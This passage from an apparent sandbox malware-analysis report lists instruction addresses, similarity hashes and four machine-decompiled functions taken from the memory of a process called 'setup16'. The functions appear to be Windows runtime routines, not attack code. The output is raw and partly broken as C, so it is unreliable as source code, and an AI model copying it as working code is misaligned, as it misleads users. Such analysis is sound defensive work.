                                                                                                                                                                                                        0x04a46a77
                                                                                                                                                                                                        0x04a46a7d
                                                                                                                                                                                                        0x04a46a86
                                                                                                                                                                                                        0x04a46a89
                                                                                                                                                                                                        0x04a46a9c
                                                                                                                                                                                                        0x04a46a9f
                                                                                                                                                                                                        0x04a46aa2
                                                                                                                                                                                                        0x04a46aa5
                                                                                                                                                                                                        0x04a46aaf
                                                                                                                                                                                                        0x04a46ab1
                                                                                                                                                                                                        0x04a46ab8
                                                                                                                                                                                                        0x04a46ab9
                                                                                                                                                                                                        0x04a46abb
                                                                                                                                                                                                        0x04a46abe
                                                                                                                                                                                                        0x04a46ac5
                                                                                                                                                                                                        0x04a46ac5
                                                                                                                                                                                                        0x04a46aaf
                                                                                                                                                                                                        0x04a46a40
                                                                                                                                                                                                        0x04a46a26
                                                                                                                                                                                                        0x04a469fe
                                                                                                                                                                                                        0x04a46ace
                                                                                                                                                                                                        0x04a46ad0
                                                                                                                                                                                                        0x04a46ad3
                                                                                                                                                                                                        0x04a46ad8
                                                                                                                                                                                                        0x04a46adf
                                                                                                                                                                                                        0x04a46adf
                                                                                                                                                                                                        0x04a46ae8
                                                                                                                                                                                                        0x04a46aef
                                                                                                                                                                                                        0x04a46aef
                                                                                                                                                                                                        0x04a46af9
                                                                                                                                                                                                        0x04a46b06

                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: e9a15642ab6c41cddcab98a9ee34de01801b6104e844491fac78d1e5dc9f7d54
                                                                                                                                                                                                        • Instruction ID: 3cf8075cb13df7729422b1b9b2930ee53ae5d2b660f45d6d4b7966ea2d1231d6
                                                                                                                                                                                                        • Opcode Fuzzy Hash: e9a15642ab6c41cddcab98a9ee34de01801b6104e844491fac78d1e5dc9f7d54
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 074182B1D00608AFDB14DFA5D940BFEBBF8FF89718F148129E914A7291DB74A905CB50
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 049C5210 Relevance: .1, Instructions: 107COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 85%
                                                                                                                                                                                                        			E049C5210(intOrPtr _a4, void* _a8) {
				void* __ecx;
				intOrPtr _t31;
				signed int _t32;
				signed int _t33;
				intOrPtr _t35;
				signed int _t52;
				void* _t54;
				void* _t56;
				unsigned int _t59;
				signed int _t60;
				void* _t61;

				_t61 = E049C52A5(1);
				if(_t61 == 0) {
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t54 =  *((intOrPtr*)(_t31 + 0x28));
					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
				} else {
					_t54 =  *((intOrPtr*)(_t61 + 0x10));
					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
				}
				_t60 = _t59 >> 1;
				_t32 = 0x3a;
				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
					_t52 = _t60 + _t60;
					if(_a4 > _t52) {
						goto L5;
					}
					if(_t61 != 0) {
						asm("lock xadd [esi], eax");
						if((_t32 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E04A095D0();
							L049E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					} else {
						E049DEB70(_t54, 0x4ab79a0);
					}
					_t26 = _t52 + 2; // 0xddeeddf0
					return _t26;
				} else {
					_t52 = _t60 + _t60;
					if(_a4 < _t52) {
						if(_t61 != 0) {
							asm("lock xadd [esi], eax");
							if((_t32 | 0xffffffff) == 0) {
								_push( *((intOrPtr*)(_t61 + 4)));
								E04A095D0();
								L049E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
							}
						} else {
							E049DEB70(_t54, 0x4ab79a0);
						}
						return _t52;
					}
					L5:
					_t33 = E04A0F3E0(_a8, _t54, _t52);
					if(_t61 == 0) {
						E049DEB70(_t54, 0x4ab79a0);
					} else {
						asm("lock xadd [esi], eax");
						if((_t33 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E04A095D0();
							L049E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					}
					_t35 = _a8;
					if(_t60 <= 1) {
						L9:
						_t60 = _t60 - 1;
						 *((short*)(_t52 + _t35 - 2)) = 0;
						goto L10;
					} else {
						_t56 = 0x3a;
						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
							 *((short*)(_t52 + _t35)) = 0;
							L10:
							return _t60 + _t60;
						}
						goto L9;
					}
				}
			}














                                                                                                                                                                                                        0x049c5220
                                                                                                                                                                                                        0x049c5224
                                                                                                                                                                                                        0x04a20d13
                                                                                                                                                                                                        0x04a20d16
                                                                                                                                                                                                        0x04a20d19
                                                                                                                                                                                                        0x049c522a
                                                                                                                                                                                                        0x049c522a
                                                                                                                                                                                                        0x049c522d
                                                                                                                                                                                                        0x049c522d
                                                                                                                                                                                                        0x049c5231
                                                                                                                                                                                                        0x049c5235
                                                                                                                                                                                                        0x049c5239
                                                                                                                                                                                                        0x04a20d5c
                                                                                                                                                                                                        0x04a20d62
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a20d6a
                                                                                                                                                                                                        0x04a20d7b
                                                                                                                                                                                                        0x04a20d7f
                                                                                                                                                                                                        0x04a20d81
                                                                                                                                                                                                        0x04a20d84
                                                                                                                                                                                                        0x04a20d95
                                                                                                                                                                                                        0x04a20d95
                                                                                                                                                                                                        0x04a20d6c
                                                                                                                                                                                                        0x04a20d71
                                                                                                                                                                                                        0x04a20d71
                                                                                                                                                                                                        0x04a20d9a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049c524a
                                                                                                                                                                                                        0x049c524a
                                                                                                                                                                                                        0x049c5250
                                                                                                                                                                                                        0x04a20d24
                                                                                                                                                                                                        0x04a20d35
                                                                                                                                                                                                        0x04a20d39
                                                                                                                                                                                                        0x04a20d3b
                                                                                                                                                                                                        0x04a20d3e
                                                                                                                                                                                                        0x04a20d50
                                                                                                                                                                                                        0x04a20d50
                                                                                                                                                                                                        0x04a20d26
                                                                                                                                                                                                        0x04a20d2b
                                                                                                                                                                                                        0x04a20d2b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a20d55
                                                                                                                                                                                                        0x049c5256
                                                                                                                                                                                                        0x049c525b
                                                                                                                                                                                                        0x049c5265
                                                                                                                                                                                                        0x04a20da7
                                                                                                                                                                                                        0x049c526b
                                                                                                                                                                                                        0x049c526e
                                                                                                                                                                                                        0x049c5272
                                                                                                                                                                                                        0x04a20db1
                                                                                                                                                                                                        0x04a20db4
                                                                                                                                                                                                        0x04a20dc5
                                                                                                                                                                                                        0x04a20dc5
                                                                                                                                                                                                        0x049c5272
                                                                                                                                                                                                        0x049c5278
                                                                                                                                                                                                        0x049c527e
                                                                                                                                                                                                        0x049c528a
                                                                                                                                                                                                        0x049c528c
                                                                                                                                                                                                        0x049c528d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049c5280
                                                                                                                                                                                                        0x049c5282
                                                                                                                                                                                                        0x049c5288
                                                                                                                                                                                                        0x049c529f
                                                                                                                                                                                                        0x049c5292
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049c5292
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049c5288
                                                                                                                                                                                                        0x049c527e

                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: b0eca171594c3ef83e09fbf3b4c403715da7803cd4d778b5c3acdf863f59f9dc
                                                                                                                                                                                                        • Instruction ID: 053c8683d4869a38d06a7c4c5fa5559fc2159227a163c92d0f52f2afbea83147
                                                                                                                                                                                                        • Opcode Fuzzy Hash: b0eca171594c3ef83e09fbf3b4c403715da7803cd4d778b5c3acdf863f59f9dc
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4B314631246620EFD736AF18CA80F7677A9FF40770F118A29E5594B1E1EB70F800DA91
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 04A03D43 Relevance: .1, Instructions: 106COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E04A03D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L22:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E049D7B60(0, _t61, 0x49a11c4);
						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E049D7B60(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L19:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L19;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = L049E4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L22;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}
















                                                                                                                                                                                                        0x04a03d4c
                                                                                                                                                                                                        0x04a03d50
                                                                                                                                                                                                        0x04a03d55
                                                                                                                                                                                                        0x04a03d5e
                                                                                                                                                                                                        0x04a3e79a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a3e79a
                                                                                                                                                                                                        0x04a03d68
                                                                                                                                                                                                        0x04a3e789
                                                                                                                                                                                                        0x04a03d9d
                                                                                                                                                                                                        0x04a03da3
                                                                                                                                                                                                        0x04a03daf
                                                                                                                                                                                                        0x04a03db5
                                                                                                                                                                                                        0x04a03dbc
                                                                                                                                                                                                        0x04a03dc4
                                                                                                                                                                                                        0x04a03dc9
                                                                                                                                                                                                        0x04a03dce
                                                                                                                                                                                                        0x04a3e7ae
                                                                                                                                                                                                        0x04a3e7ae
                                                                                                                                                                                                        0x04a03dde
                                                                                                                                                                                                        0x04a03de2
                                                                                                                                                                                                        0x04a03de7
                                                                                                                                                                                                        0x04a03e0d
                                                                                                                                                                                                        0x04a03e13
                                                                                                                                                                                                        0x04a03e16
                                                                                                                                                                                                        0x04a03e1e
                                                                                                                                                                                                        0x04a03e25
                                                                                                                                                                                                        0x04a03e28
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a03e2a
                                                                                                                                                                                                        0x04a03e2f
                                                                                                                                                                                                        0x04a03e37
                                                                                                                                                                                                        0x04a03e37
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a03e37
                                                                                                                                                                                                        0x04a03e31
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a03e31
                                                                                                                                                                                                        0x04a03e20
                                                                                                                                                                                                        0x04a03e20
                                                                                                                                                                                                        0x04a03e35
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a03de9
                                                                                                                                                                                                        0x04a03de9
                                                                                                                                                                                                        0x04a03de9
                                                                                                                                                                                                        0x04a03dee
                                                                                                                                                                                                        0x04a03dfd
                                                                                                                                                                                                        0x04a03dff
                                                                                                                                                                                                        0x04a03e02
                                                                                                                                                                                                        0x04a03e05
                                                                                                                                                                                                        0x04a03e05
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a03df0
                                                                                                                                                                                                        0x04a03de7
                                                                                                                                                                                                        0x04a3e78f
                                                                                                                                                                                                        0x04a3e794
                                                                                                                                                                                                        0x04a03d79
                                                                                                                                                                                                        0x04a03d84
                                                                                                                                                                                                        0x04a03d89
                                                                                                                                                                                                        0x04a03d8e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a3e7a4
                                                                                                                                                                                                        0x04a03d96
                                                                                                                                                                                                        0x04a03d9a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a03d9a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a3e794
                                                                                                                                                                                                        0x04a03d6e
                                                                                                                                                                                                        0x04a03d73
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a3e7b5
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: cfe4b57c141da78ae6e039c2e4ca3f094930f58603adab5e2bf4d4b06df69fb9
                                                                                                                                                                                                        • Instruction ID: 688f5bd3949005aff7233a70a6ba990b0b1e89cb14cd37c74127ff59ea4a2971
                                                                                                                                                                                                        • Opcode Fuzzy Hash: cfe4b57c141da78ae6e039c2e4ca3f094930f58603adab5e2bf4d4b06df69fb9
                                                                                                                                                                                                        • Instruction Fuzzy Hash: DA319C71B00615DFCB248F2AE841A6BBBF5EF95700B05C86AE849CB390F730E850D790
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 049FA61C Relevance: .1, Instructions: 106COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 78%
                                                                                                                                                                                                        			E049FA61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				intOrPtr _t39;
				intOrPtr _t45;
				intOrPtr* _t51;
				intOrPtr* _t52;
				intOrPtr* _t55;
				signed int _t57;
				intOrPtr* _t59;
				intOrPtr _t68;
				intOrPtr* _t77;
				void* _t79;
				signed int _t80;
				intOrPtr _t81;
				char* _t82;
				void* _t83;

				_push(0x24);
				_push(0x4aa0220);
				E04A1D08C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
				_t79 = __ecx;
				_t35 =  *0x4ab7b9c; // 0x0
				_t55 = L049E4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
				if(_t55 == 0) {
					_t39 = 0xc0000017;
					L11:
					return E04A1D0D1(_t39);
				}
				_t68 = 0;
				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
				 *(_t83 - 4) =  *(_t83 - 4) & 0;
				_t7 = _t55 + 8; // 0x8
				_t57 = 6;
				memcpy(_t7, _t79, _t57 << 2);
				_t80 = 0xfffffffe;
				 *(_t83 - 4) = _t80;
				if(0 < 0) {
					L14:
					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
					L20:
					L049E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
					_t39 = _t81;
					goto L11;
				}
				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
					_t81 = 0xc000007b;
					goto L20;
				}
				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
					_t59 =  *((intOrPtr*)(_t83 + 8));
					_t45 =  *_t59;
					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
					 *_t59 = _t45 + 1;
					L6:
					 *(_t83 - 4) = 1;
					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
					 *(_t83 - 4) = _t80;
					if(_t68 < 0) {
						_t82 =  *((intOrPtr*)(_t83 + 0xc));
						if(_t82 == 0) {
							goto L14;
						}
						asm("btr eax, ecx");
						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
						if( *_t82 != 0) {
							 *0x4ab7b10 =  *0x4ab7b10 - 8;
						}
						goto L20;
					}
					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
					_t51 =  *0x4ab536c; // 0xa87650
					if( *_t51 != 0x4ab5368) {
						_push(3);
						asm("int 0x29");
						goto L14;
					}
					 *_t55 = 0x4ab5368;
					 *((intOrPtr*)(_t55 + 4)) = _t51;
					 *_t51 = _t55;
					 *0x4ab536c = _t55;
					_t52 =  *((intOrPtr*)(_t83 + 0x10));
					if(_t52 != 0) {
						 *_t52 = _t55;
					}
					_t39 = 0;
					goto L11;
				}
				_t77 =  *((intOrPtr*)(_t83 + 8));
				_t68 = E049FA70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
				if(_t68 < 0) {
					goto L14;
				}
				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
				goto L6;
			}


















                                                                                                                                                                                                        0x049fa61c
                                                                                                                                                                                                        0x049fa61e
                                                                                                                                                                                                        0x049fa623
                                                                                                                                                                                                        0x049fa628
                                                                                                                                                                                                        0x049fa62b
                                                                                                                                                                                                        0x049fa62d
                                                                                                                                                                                                        0x049fa648
                                                                                                                                                                                                        0x049fa64a
                                                                                                                                                                                                        0x049fa64f
                                                                                                                                                                                                        0x04a39b44
                                                                                                                                                                                                        0x049fa6ec
                                                                                                                                                                                                        0x049fa6f1
                                                                                                                                                                                                        0x049fa6f1
                                                                                                                                                                                                        0x049fa655
                                                                                                                                                                                                        0x049fa657
                                                                                                                                                                                                        0x049fa65a
                                                                                                                                                                                                        0x049fa65d
                                                                                                                                                                                                        0x049fa662
                                                                                                                                                                                                        0x049fa663
                                                                                                                                                                                                        0x049fa667
                                                                                                                                                                                                        0x049fa668
                                                                                                                                                                                                        0x049fa66d
                                                                                                                                                                                                        0x049fa706
                                                                                                                                                                                                        0x049fa706
                                                                                                                                                                                                        0x04a39bda
                                                                                                                                                                                                        0x04a39be6
                                                                                                                                                                                                        0x04a39beb
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a39beb
                                                                                                                                                                                                        0x049fa679
                                                                                                                                                                                                        0x04a39b7a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a39b7a
                                                                                                                                                                                                        0x049fa683
                                                                                                                                                                                                        0x049fa6f4
                                                                                                                                                                                                        0x049fa6f7
                                                                                                                                                                                                        0x049fa6f9
                                                                                                                                                                                                        0x049fa6fd
                                                                                                                                                                                                        0x049fa6a0
                                                                                                                                                                                                        0x049fa6a0
                                                                                                                                                                                                        0x049fa6ad
                                                                                                                                                                                                        0x049fa6af
                                                                                                                                                                                                        0x049fa6b4
                                                                                                                                                                                                        0x04a39ba7
                                                                                                                                                                                                        0x04a39bac
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a39bc6
                                                                                                                                                                                                        0x04a39bce
                                                                                                                                                                                                        0x04a39bd1
                                                                                                                                                                                                        0x04a39bd3
                                                                                                                                                                                                        0x04a39bd3
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a39bd1
                                                                                                                                                                                                        0x049fa6bd
                                                                                                                                                                                                        0x049fa6c3
                                                                                                                                                                                                        0x049fa6c6
                                                                                                                                                                                                        0x049fa6d2
                                                                                                                                                                                                        0x049fa701
                                                                                                                                                                                                        0x049fa704
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049fa704
                                                                                                                                                                                                        0x049fa6d4
                                                                                                                                                                                                        0x049fa6d6
                                                                                                                                                                                                        0x049fa6d9
                                                                                                                                                                                                        0x049fa6db
                                                                                                                                                                                                        0x049fa6e1
                                                                                                                                                                                                        0x049fa6e6
                                                                                                                                                                                                        0x049fa6e8
                                                                                                                                                                                                        0x049fa6e8
                                                                                                                                                                                                        0x049fa6ea
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049fa6ea
                                                                                                                                                                                                        0x049fa688
                                                                                                                                                                                                        0x049fa692
                                                                                                                                                                                                        0x049fa694
                                                                                                                                                                                                        0x049fa699
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049fa69d
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 39dba1835578bd6ea56d6f468f4a18f040e813df402760e0a20875d3055e89e0
                                                                                                                                                                                                        • Instruction ID: 75ef2af6cf89105e1eae6d9a3dd77afd0c569c9208129a0f7b5be05a30a16de6
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 39dba1835578bd6ea56d6f468f4a18f040e813df402760e0a20875d3055e89e0
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 674169B5A00205DFDB15CF58C890B9ABBF5FF99304F1480A9E909AB355D774B901CF94
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 04A47016 Relevance: .1, Instructions: 104COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 76%
                                                                                                                                                                                                        			E04A47016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed short* _v600;
				char _v604;
				short _v606;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short* _t55;
				void* _t56;
				signed short* _t58;
				signed char* _t61;
				char* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				signed int _t75;

				_t64 = __edx;
				_t77 = (_t75 & 0xfffffff8) - 0x25c;
				_v8 =  *0x4abd360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
				_t55 = _a16;
				_v606 = __ecx;
				_t71 = 0;
				_t58 = _a12;
				_v596 = __edx;
				_v600 = _t58;
				_t68 =  &_v588;
				if(_t58 != 0) {
					_t71 = ( *_t58 & 0x0000ffff) + 2;
					if(_t55 != 0) {
						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
					}
				}
				_t8 = _t71 + 0x2a; // 0x28
				_t33 = _t8;
				_v592 = _t8;
				if(_t71 <= 0x214) {
					L6:
					 *((short*)(_t68 + 6)) = _v606;
					if(_t64 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
						 *((char*)(_t68 + 0x28)) = _a4;
						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
						 *((char*)(_t68 + 0x29)) = _a8;
						if(_t71 != 0) {
							_t22 = _t68 + 0x2a; // 0x2a
							_t64 = _t22;
							E04A46B4C(_t58, _t22, _t71,  &_v604);
							if(_t55 != 0) {
								_t25 = _v604 + 0x2a; // 0x2a
								_t64 = _t25 + _t68;
								E04A46B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
							}
							if(E049E7D50() == 0) {
								_t61 = 0x7ffe0384;
							} else {
								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_push(_t68);
							_push(_v592 + 0xffffffe0);
							_push(0x402);
							_push( *_t61 & 0x000000ff);
							E04A09AE0();
						}
					}
					_t35 =  &_v588;
					if( &_v588 != _t68) {
						_t35 = L049E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
					}
					L16:
					_pop(_t69);
					_pop(_t72);
					_pop(_t56);
					return E04A0B640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
				}
				_t68 = L049E4620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				if(_t68 == 0) {
					goto L16;
				} else {
					_t58 = _v600;
					_t64 = _v596;
					goto L6;
				}
			}






















                                                                                                                                                                                                        0x04a47016
                                                                                                                                                                                                        0x04a4701e
                                                                                                                                                                                                        0x04a4702b
                                                                                                                                                                                                        0x04a47033
                                                                                                                                                                                                        0x04a47037
                                                                                                                                                                                                        0x04a4703c
                                                                                                                                                                                                        0x04a4703e
                                                                                                                                                                                                        0x04a47041
                                                                                                                                                                                                        0x04a47045
                                                                                                                                                                                                        0x04a4704a
                                                                                                                                                                                                        0x04a47050
                                                                                                                                                                                                        0x04a47055
                                                                                                                                                                                                        0x04a4705a
                                                                                                                                                                                                        0x04a47062
                                                                                                                                                                                                        0x04a47062
                                                                                                                                                                                                        0x04a4705a
                                                                                                                                                                                                        0x04a47064
                                                                                                                                                                                                        0x04a47064
                                                                                                                                                                                                        0x04a47067
                                                                                                                                                                                                        0x04a47071
                                                                                                                                                                                                        0x04a47096
                                                                                                                                                                                                        0x04a4709b
                                                                                                                                                                                                        0x04a470a2
                                                                                                                                                                                                        0x04a470a6
                                                                                                                                                                                                        0x04a470a7
                                                                                                                                                                                                        0x04a470ad
                                                                                                                                                                                                        0x04a470b3
                                                                                                                                                                                                        0x04a470b6
                                                                                                                                                                                                        0x04a470bb
                                                                                                                                                                                                        0x04a470c3
                                                                                                                                                                                                        0x04a470c3
                                                                                                                                                                                                        0x04a470c6
                                                                                                                                                                                                        0x04a470cd
                                                                                                                                                                                                        0x04a470dd
                                                                                                                                                                                                        0x04a470e0
                                                                                                                                                                                                        0x04a470e2
                                                                                                                                                                                                        0x04a470e2
                                                                                                                                                                                                        0x04a470ee
                                                                                                                                                                                                        0x04a47101
                                                                                                                                                                                                        0x04a470f0
                                                                                                                                                                                                        0x04a470f9
                                                                                                                                                                                                        0x04a470f9
                                                                                                                                                                                                        0x04a4710a
                                                                                                                                                                                                        0x04a4710e
                                                                                                                                                                                                        0x04a47112
                                                                                                                                                                                                        0x04a47117
                                                                                                                                                                                                        0x04a47118
                                                                                                                                                                                                        0x04a47118
                                                                                                                                                                                                        0x04a470bb
                                                                                                                                                                                                        0x04a4711d
                                                                                                                                                                                                        0x04a47123
                                                                                                                                                                                                        0x04a47131
                                                                                                                                                                                                        0x04a47131
                                                                                                                                                                                                        0x04a47136
                                                                                                                                                                                                        0x04a4713d
                                                                                                                                                                                                        0x04a4713e
                                                                                                                                                                                                        0x04a4713f
                                                                                                                                                                                                        0x04a4714a
                                                                                                                                                                                                        0x04a4714a
                                                                                                                                                                                                        0x04a47084
                                                                                                                                                                                                        0x04a47088
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a4708e
                                                                                                                                                                                                        0x04a4708e
                                                                                                                                                                                                        0x04a47092
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a47092

                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
